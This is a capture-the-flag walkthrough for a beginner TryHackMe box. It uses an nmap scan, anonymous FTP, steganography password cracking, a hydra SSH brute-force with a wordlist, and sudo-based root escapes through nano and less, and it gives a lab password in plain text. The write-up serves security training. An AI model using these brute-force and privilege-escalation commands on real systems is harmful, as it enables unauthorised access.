# TryHackMe-BrooklynCTF
Abdullah Rizwan, 25 August , 09:15 PM
BrooklynCTF is a beginner level anyone can try to hack this box. There are two main intended ways to root the box.
## NMAP
```
nmap -sC -sV 10.10.182.198
```
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 21:16 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:16 (0:00:00 remaining)
Nmap scan report for 10.10.182.198
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.94.60
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
```
There are 3 ports open on this box.Lets first visit the webpage.
## PORT 80
When we look at the source of this page it says something about steganography so that image has something hidden with it.
## PORT 21
Since ftp is open we can connect to using the username "anonymous" with no password to be provided and we can download a file named "note_to_jake".
So we know that there is a user named "jake".
## Steganography
We saw a hidden message towards steganography so now lets try to extract data from image.
If we try to extract data from image it's going to ask for a password so we have to crack it using "stegcracker" which can be installed from here
https://github.com/Paradoxis/StegCracker.
## PORT 22
As we have found that there are two users "jake" and "holt" in order to find out jake's password we can bruteforce ssh using hydra
```
hydra -l jake -P /usr/share/wordlists/rockyou.txt -t 16 10.10.182.198 ssh
```
For simplicity lets make a variable for the box's IP
```
export IP=10.10.182.198
```
We can now use "less" command in order to view files.
## Privilege Escalation (Holt)
In order to completely own the box through Holt we have sudo rights for "nano".
The password that we got from extracting information from the image can be utilized here
Login as "holt" from ssh using password "fluffydog12@ninenine".
```
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano
holt@brookly_nine_nine:~$
```
Visit GTFOBIN for escalating privileges
```
sudo nano
```
```
^R^X
```
```
reset; sh 1>&0 2>&0
```
As soon as you'll hit enter you will be "root".
## Privilege Escalation (Jake)
Login as jake through ssh after you got his credentials through bruteforce or you can switch between usesr.
```
su - jake
password:
```
```
sudo less /etc/profile
```
```
!/bin/sh
```